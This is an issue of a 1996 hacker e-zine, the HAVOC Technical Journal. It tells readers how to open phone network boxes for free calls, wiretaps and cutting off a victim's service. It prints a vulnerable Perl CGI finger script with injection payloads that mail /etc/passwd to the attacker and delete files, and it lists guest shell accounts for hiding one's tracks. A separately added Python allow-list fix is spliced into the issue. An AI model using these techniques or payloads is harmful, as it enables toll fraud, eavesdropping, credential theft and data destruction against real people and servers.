The HAVOC Technical Journal

Vol. 1 | No.4 | October 1st, 1996 | A HAVOC Bell Systems Publication

"Protected by the First Amendment"


Inside this issue:

What's new this issue
Editorial
The Network Identification Device Pt. 1
Writing Insecure CGI Progs
The End of penet.fi
ROLL CALL & more!
Next Month
All by Scud-O
Download a copy of issue 4
Go back to the index
	
       (I need more writers!!! e-mail me if ya want to write an article!
        my e-mail is: FoxMulder@worldnet.att.net (yes its back up..)
        the mags e-mail is: thtj@juno.com (wheee.. we get to read ads as
        we get your e-mail!) )

        This months music supplied by: Sublime, The Future Sound of London
        and Zion Train and Violent Femmes. Oh yea.. and WHFS 99.1 !

What's new in this issue:

        Well if you weren't so cheap you would see our nice new format! but
        the online version has none of that neatness.. My new school has a
        lab with a scanner so the print version should get some nice pics
        soon...
        Also Scud-O is now on IRC often.. I'm on #phreak and #hacker often on
        undernet.. so c'mon in and join us for a chat...
        If ya want a print version and some extra goodies... e-mail me!

       -----------------------------------------------------------
       How to contact us:
        Check Out Our Web Site:
         www.geocities.com/SiliconValley/8805/
         my (Scud-O)  e-mail is : FoxMulder@worldnet.att.net
         our Mag e-mail is : thtj@juno.com
         HELLCORE's e-mail is : hellcore@juno.com
      ---------------------------------------------------------------

Editorial:

        by Scud-O

Well another month another issue.. but hey if ya had the print version you
would see our nice new format.. its kind of slick... were still messing
around so it can only get better...Welp on to bigger and other things...
lately i've been hit with ALOT of lamers.. (I gots ops on #hacker, thats why)
(sometimes on #phreak as well...) well anyway.. EVERY lamer on #hacker was
like 'teach me' so i replied 'on what?' they came back with 'everything' so
i said 'get some manuals and RTFM' and they all replied 'what?' .. people
this is PATHETIC!! We need to protect ourselves from these newbies! any
suggestions? e-me: FoxMulder@worldnet.att.net

The Network Identification Device (NID) Pt.1

        by Scud-O

These days it seems that NIDs have been left unabused when they are a great
device to mess with. Why, you ask? Well, there are many things you can do with
them. But first, where can you find them? Well, every house has one! My house
has an old one, but most new ones I see are the size of a sunglass case
and have a 7/16 inch socket screw in them. There are also some bigger ones
(usually in housing complexes) that have a user opening and a telco opening.

A little history:
        The NID was created for test purposes. The NID is the main
connection from Bell to the house's lines. You can test at the NID to see if
Bell's lines are fucked or if your lines are fucked. If you live in the
Bell Atlantic area, their White Pages have some info on NIDs.

Back to the article:
        The NID can be used for many purposes:
1. Free phone calls: Inside the NID there is a jack and a plug. If you unplug
the jack and stick a phone in the plug you can then make calls free of
charge, but the lines restrictions still apply (900 block, call waiting, etc)
To find the line number just use your trusty ANI. And since the jack in the
NID is out, the customer can't interrupt you and make a call. Or you can find
a 2 jack to one converter (they sell em in Radio Shack.. its so you can put
more than one phone in a jack) and plug it all together so they can still
make calls.
2. Phone tap: This is just a modification of the 2 to 1 jack converter, just
wait for a call.. you cant leave the phone off the hook.. well because it
will go off the hook... (hmm... maybe next month I'll find out how to be able
to listen 24 hours a day...)
3. Disconnect customer: did someone piss you off? we just open their NID and
unplug the jack and leave... no service... it will take a few days to get
service and they are just totally fucked then... hehehehehehe...

Next Month: read as I steal a NID and slice and dice it!! also: more fun
tricks!


Writing Insecure CGI Progs:

        by Scud-O

CGI programs really are wonderful.. they can easily give out information
that we shouldn't have!

What follows is a simple CGI prog that you can install to get the server's
password file! The program is actually a finger gateway.. but who cares..
next month or maybe this month I'll print the secure source code to show a
webmaster or sysadmin...

Here's the HTML code:
	(NOTE: take out the extra '<'s ! had to do it.. otherwise the
	HTML was fucked in this file! )

Here's the actual CGI Perl Prog:

        #!/usr/local/bin/perl
        # Finger gateway. $user comes straight from the form and is dropped
        # into a shell command line (backticks) without any checking.
        &parse_form_data(*simple);
        $user = $simple{'user'};
        print "Content-type: text/plain", "\n\n";
        print "Here are the results of your query: \n";
        print `/usr/local/bin/finger $user`;
        print "\n";
        exit (0);

the parse_form_data sub:
        (NOTE: ya need this to translate the info for both progs.. other wise
        ya fucked! )

        sub parse_form_data {
            local(*FORM_DATA) = @_;
            local($request_method, $query_string, @key_value_pairs,
                  $key_value, $key, $value);

            $request_method = $ENV{'REQUEST_METHOD'};
            if ($request_method eq "GET") {
                $query_string = $ENV{'QUERY_STRING'};
            } elsif ($request_method eq "POST") {
                # POST data arrives on STDIN; CONTENT_LENGTH is only its size.
                read(STDIN, $query_string, $ENV{'CONTENT_LENGTH'});
            } else {
                &return_error(500, "Server Error", "Server uses unsupported method");
            }

            # Split "a=1&b=2" into pairs, then undo the form encoding:
            # '+' is a space and %XX is a hex-encoded byte.
            @key_value_pairs = split(/&/, $query_string);
            foreach $key_value (@key_value_pairs) {
                ($key, $value) = split(/=/, $key_value);
                $value =~ tr/+/ /;
                $value =~ s/%([\dA-Fa-f][\dA-Fa-f])/pack("C", hex($1))/eg;
                if (defined($FORM_DATA{$key})) {
                    # Repeated field: keep every value, NUL-separated.
                    $FORM_DATA{$key} = join("\0", $FORM_DATA{$key}, $value);
                } else {
                    $FORM_DATA{$key} = $value;
                }
            }
        }

the return_error sub:
        (NOTE: ya need this for the parse sub, and the patched version! )

        sub return_error {
            local($status, $keyword, $message) = @_;
            # $webmaster is the site's contact address; set it before use.
            print "Content-type: text/html", "\n";
            print "Status: ", $status, " ", $keyword, "\n\n";
            print <<End_of_Error;
        Unexpected Error!

        $keyword

        $message

        Please contact $webmaster for more information.
        End_of_Error
            exit(1);
        }

So thats it! below is the patched source:

        #!/usr/local/bin/perl
        &parse_form_data(*simple);
        $user = $simple{'user'};
        # Deny-list check: reject the shell metacharacters used in the
        # attacks below before $user ever reaches the shell.
        if ($user =~ /[;><&\*'\|]/) {
            &return_error(500, "CGI Finger Alert", "What are you trying to do?");
        } else {
            print "Content-type: text/plain", "\n\n";
            print "Here are the results of your query: \n";
            print `/usr/local/bin/finger $user`;
            print "\n";
        }
        exit (0);
So what, you ask? Well, with the first one, if you type:
 ; mail -s "passwords!"  you@yourdomain.com < /etc/passwd
 then you get yourself a copy of the server's password list mailed to
 you!
 or try:
        ; rm *
and delete their directory of files!
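The patched script above works from a deny-list of shell metacharacters. An added example, not from the zine, showing the allow-list approach instead, written in Python: the form value is decoded the same way parse_form_data does, checked against the characters a login name (optionally @host) may contain, and handed to finger as an argv list with no shell in between, so nothing the attacker types is ever interpreted as a command. The /usr/local/bin/finger path is taken from the script above; the sample query string is constructed for the demo.

```python
import re
import subprocess
from urllib.parse import parse_qs

FINGER = "/usr/local/bin/finger"   # path used by the zine's script; assumed present on the host

# Allow-list for a finger target: a login name, optionally followed by @host.
# Anything outside this alphabet (';', '<', '|', quotes, spaces, ...) fails.
USER_RE = re.compile(r"[A-Za-z0-9._-]{1,32}(?:@[A-Za-z0-9.-]{1,253})?")

def parse_user(query_string):
    """Same decoding as parse_form_data ('+' -> space, %XX -> byte), via the stdlib."""
    values = parse_qs(query_string, keep_blank_values=True).get("user", [])
    return values[0] if values else None

def unsafe_command(user):
    """What the zine's script hands to /bin/sh: the raw value spliced into a command line."""
    return f"{FINGER} {user}"

def safe_argv(user):
    """Allow-list check, then an argv list; returns None when the value is rejected."""
    if user is None or not USER_RE.fullmatch(user):
        return None
    return [FINGER, user]

def run_finger(user, timeout=5):
    """Gateway entry point: (status, body). Rejected input never reaches a process."""
    argv = safe_argv(user)
    if argv is None:
        return (400, "rejected: user must be a login name, optionally @host")
    # shell=False (the default): argv goes straight to execve, no /bin/sh parsing.
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return (200, proc.stdout)

# Constructed sample: the zine's first payload, as the browser would URL-encode it.
SAMPLE_QUERY = "user=%3B+mail+-s+%22passwords%21%22+you%40example.com+%3C+/etc/passwd"

if __name__ == "__main__":
    injected = parse_user(SAMPLE_QUERY)
    print("zine script would run:", unsafe_command(injected))
    print("allow-list verdict:", run_finger(injected))
```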

The End of penet.fi :

        by Scud-O
Well the pressure was finally too much, as penet.fi will no longer give out
anonymous e-mail. But the people that already have addresses can still send
stuff. But newsgroup posts aren't allowed anymore... but you can still get
anon news posts. So what will happen? well I think hacking penet emails will
be fun for a while, but we will all start getting Juno accounts.. they're free,
 you can forge them, and they are disposable, but you have to read e-mail,
 click thru a list of hobbies, etc, and more, and then your e-mails get ads
 in them... oh well though...

ROLL CALL & More!


Who is HAVOC?

        Scud-O : Pope boy
        Psycho : Fag Vice Pope
        Pinky  : In hiding
        Rotten : Moving fool
        Sid    : Other Moving Fool  (and they're twins as well! )

        Want to join? next month we got a sign up sheet!

Cool People:

        |\|\cFill
        theLURK7R (sometimes theLURK3R )
        JKMG-Boba ( aka Boba)
        Alef
              all on IRC!

This Month Question:

	We ask why has |)eadLoss\Mulder changed his name?
        Well.. some knew me as |)eadLoss ,  some as Mulder, so I
        combined the 2.. but people were ever more confused, so I said fuck em!
        and I changed it to Scud-O .. Scud-O is a cool guy..

  Next Month's Question: Who is Scud-O ?

Next Month:

        This MAY be what we will have in issue 5
        We have more on the NID
        Virus Theory Pt.2
        More Virus Stuff
        RTFM: The lamer Journal
        Whats up in the HELLCORE Labs?
        Pager Talk
        AND MUCH MORE TBA !

                Issue 5 is out Oct. 31st!

 cya ya next issue! -Scud-O


Wait! we have a bonus:
        Some shell accounts to use to cover your ass:

Freenet accounts:			login

freenet.buffalo.edu     		guest
freenet.hsc.colorado.edu		guest
heartland.bradley.edu			bbguest
freenet.lorain.oberlin.edu		guest
freenet.victoria.bc.ca			guest
cbos.uc.edu				visitor
yfn.ysu.edu				visitor
freenet-in-a.cwru.edu			fnguest
	   b
	   c

------------------------
Okay that is all!

============================================================
= IS this copy of The HAVOC Technical Journal Skunked?
= If this file reads larger than 11078 bytes then this issue
= has been messed with! get a fresh copy from our site:
= www.geocities.com/SiliconValley/8805/
============================================================